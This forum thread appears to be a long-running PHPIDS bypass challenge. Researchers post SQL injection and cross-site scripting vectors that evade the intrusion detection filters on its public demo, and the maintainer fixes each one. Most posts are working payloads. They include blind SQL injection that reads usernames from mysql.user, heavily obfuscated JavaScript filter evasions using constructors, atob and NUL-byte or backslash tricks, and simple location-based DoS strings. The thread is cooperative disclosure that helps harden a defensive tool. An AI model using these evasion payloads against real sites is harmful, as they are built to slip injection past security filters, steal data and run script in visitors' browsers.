Will be fixed next week - sorry for the long delay... @Reiners indeed :)

extract data blind with PHPIDS impact 0:

m' sounds like (select if (mid((select `username` from users limit 1),1,1)=0x71 , 0 , \N)) and '1

link (because every space is needed):

http://demo.php-ids.org/?test=m'%20sounds%20like%20(select%20if%20%20(mid((select%20%60username%60%20from%20users%20limit%201),1,1)=0x71%20,%200%20,%20%5CN))%20and%20'1

interesting to note:
- functions can be called with lots of spaces before parenthesis: SELECT ascii (1)
- there can be a lot of bullshit in this part and the syntax is still valid:
select(name) `bullshit bullshit bullshit`from users
- this works as well:
select`name`buuullshit from users



Edited 1 time(s). Last edit at 07/12/2010 05:30PM by Reiners.

Reiners Wrote:
-------------------------------------------------------
> interesting to note:
> - functions can be called with lots of spaces
> before parenthesis: SELECT ascii (1)

it's a nice trick, but from what I remember it doesn't work with all functions.

> - there can be a lot of bullshit in this part and
> the syntax is still valid:
> select(name) `bullshit bullshit bullshit`from
> users
> - this works as well:
> select`name`buuullshit from users

just a MySQL Alias in both cases

1) Iterator - very dangerous function (FF)
* w = this <-- forbidden
* bypass:

xyz=Iterator([this]).next()
zyx=xyz[1].alert
zyx(1)

2) for each - very dangerous cycle (FF)

for each (x in{a:this})x=x.alert
x(1)

3) // also 09,0C,0B,0A,0D,A0

xzy={x :this}.x.alert
xzy(1)

http://demo.php-ids.org/?test=xzy={x%20:this}.x.alert%0Axzy%281%29

4) (GC)

xde=(1, /at\ob/\i),
rty=(1, /atob\t/\i),
atat=xde(rty),
alal=(1,/YWxlcnQ\t/\i), 
ghj=(1,/YWxlcn\Q/\i), 
alal=ghj(alal),
sor=atat.sort,
sor1=sor(),
atat=sor1[atat],
alal=atat(alal),
alal=sor1[alal],
alal(1)

5)
* x.constructor & concatenation <-- forbidden
* bypass:

ale= (1, "ale" ),
rt= (1, "rt (1),0 "),
alal= ale+rt,
x2=02.constructor,
y=x2.constructor,
y(alal)()

or

t="t (1),0 ",
x2 = (1, {x2:02.constructor,a:0}.x2),
xyz = (1, {xyz:x2.constructor,a:0}.xyz),
xyz("aler" + t)()

*sorry, I'm very difficult to stay.)

6) for in - yet another way for getting a string that is filtered.

for(lo in{j:this}.j)!/ale.t/(lo)||this[{},lo](+!'')

LeverOne

----------------------
~Veritas~



Edited 3 time(s). Last edit at 08/08/2010 08:15AM by LeverOne.

Haha nice - I liked the /./\i trick most - on character but amazing impact!

Thanks :)

Yeah those are sweet bypasses :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Thanks!

Quote

I liked the /./\i trick

look also:
1) xde = (1 , {a:0,b:/atob/,c:0}.b)
2) xde = (1,/atob/\ i)

In general, assignment - is a global problem.

x=0||this.alert
x(1)

t="t (1),0 "
for each (lo2 in{1:[].filter})
for (fake in!t);
dd=lo2.constructor
ff=dd("aler"+ t)()

Opera only <-- This vector closes my week of the PHPIDS.

xyz = "javas	\	cript:aler	\	t (1),0",
lo = {},
lo[xyz] = 0
for (0||location in"fake",lo)0

LeverOne

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/12/2010 01:30PM by LeverOne.

that' sounds like 'a bug



Edited 1 time(s). Last edit at 09/15/2010 11:22AM by Reiners.

jump'in (select 'Water') or '1



Edited 2 time(s). Last edit at 09/15/2010 11:20AM by Reiners.

All fixed - thanks!

I went all retro
You need phpids in ie7 compat for it to work on IE9 and you have to click a link

[www.businessinfo.co.uk]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 02/23/2011 12:30PM by Gareth Heyes.

welcome back =)

fo"o'or'1

Thx :) Fixed!

It had been a while since I had posted a bypass, figured it was time.
Almost hurts to see this one get fixed.

null' or @:=(select all user'' from mysql . user limit 1) union#
#
select @'

http://demo.phpids.org/?test=null' or @:=(select all user'' from mysql . user limit 1)union%23%0A%23%0Aselect @'

Wow - I hear you :) At least three bypass techniques in one vector (probably more but I managed to spot three of them :D). Thx!

A bit more abuse with the #

1' and #aa
#bb
version() like trim(0x3520)'

1'and #
#aa
0 union#
#bb
select `user`u#
#cc
from mysql.user '



Edited 1 time(s). Last edit at 04/11/2011 02:34AM by lightos.

Neat :) Those bloody comments are ever returning buggers - I installed another fix - knowing that you can possibly break it within minutes.

You're right.

1'and #
#aa
0 union#
#bb
select version()`

1'and #
#aa
0 union#
#bb
select (select `user` from#
#cc
mysql.user limit 1)'

Will leave it at that for now.

Finally managed to deploy the fix ;) Thx!

Hi,
Very nice configuration, but easy to pass on IE:

http://demo.phpids.org/?test=ale\0rt(kkk.v);\/\/<b name=kkk v=Hafif >

In addition, simple DoS are available in all browsers (though low impact)

http://demo.phpids.org/?test=location%2b%2b
http://demo.phpids.org/?test=%2b%2blocation
http://demo.phpids.org/?test=location%2b=1
.
.
.
And so on...

Hehe that was pretty easy, nice stuff!

Edit: http://demo.phpids.org/?test='uni\0on select 1-\0-\0+

Yikes!



Edited 1 time(s). Last edit at 06/14/2011 02:50PM by lightos.

I spotted the bug and managed to fix it - just committed and deployed the fresh sources. That happens when you are spoiled by Suhosin ;)

The php dev team in their infinite wisdom don't consider the conversion of \0 to NUL a bug. Crazy bastards.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

WOW, your filters are hard to beat !!
BTW, very very nice book... couldn't stop reading !!!!

Your book said that IE will fail to handle NULL bytes, which leads me to the bypass with PHP. the rules are good enough to stop the attack on modsecurity.

What do you think about the DoS scenarios. They can be naughty if persistent injections are available.



Edited 2 time(s). Last edit at 06/17/2011 12:13PM by hafif.

Hi Again,

All browsers:
http://demo.phpids.org/?test=ale\rt%281%29

A more noticeable attack:
http://demo.phpids.org/?test=\%3C\/textarea%3E\%3C\script%3Ealer\t%281%29%3C\/\script%3E


I think, this is due to the removal of the '\' char...

The same technique can be use for other attacks.



Edited 5 time(s). Last edit at 06/17/2011 01:46PM by hafif.

tut tut mario with stripslashes :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hey, I have a question,
Am I suppose to be able to inject a simple <a href> tag ?
This could be used for phising attacks.

@hafif Excuse the late reply - didn't find time to look into the issues up to now. First of all: awesome finds! Some were caused by changes in PHP 5.3.x, some were plain bugs, one was a bug in the demo resulting from the server move - overall I had three locations to fix :)

It should be quite okay now - although I have a certain feeling that you might find more. About the DoS - I am not sure yet what to do about that. Will address it in a later release. Same for the links. Usually devs might wanna allow arbitrary HTTP(s) URLs - sometimes not. We should - as far as I can think now - include an option in the Config.ini.php to delegate the setting to the HTMLPurifier API we use under the hood.

Thanks again, great finds!
.mario

.mario Wrote:
-------------------------------------------------------
> First of all:
> awesome finds! Some were caused by changes in PHP
> 5.3.x, some were plain bugs, one was a bug in the
> demo resulting from the server move - overall I
> had three locations to fix :)

THANKS :)

The following bypass was not so hard. And is using the shift operator <<.
The real challenge, which was extremely difficult was the fact that there are multiple onclick injection points which caused errors before the script tag is launched (It should be noted that this difficulty might be limited to the scope of the demo application).

But I managed to get everyone satisfied:
http://demo.phpids.org/?test=%0d%2ba%0d>>setTimeout(a(1).a%2ba(1).b%2ba(1).c,1000);%0d'1';"1"="1";a="1\"\n<a name=a a=con b=fi c=rm(120) >1<<1\'1'1\"1";

Works on IE.



Edited 2 time(s). Last edit at 06/24/2011 12:24PM by hafif.

Ha - you seem to know the regexes better than me meanwhile ;)

Again, priceless find! Fixed and thanks a lot.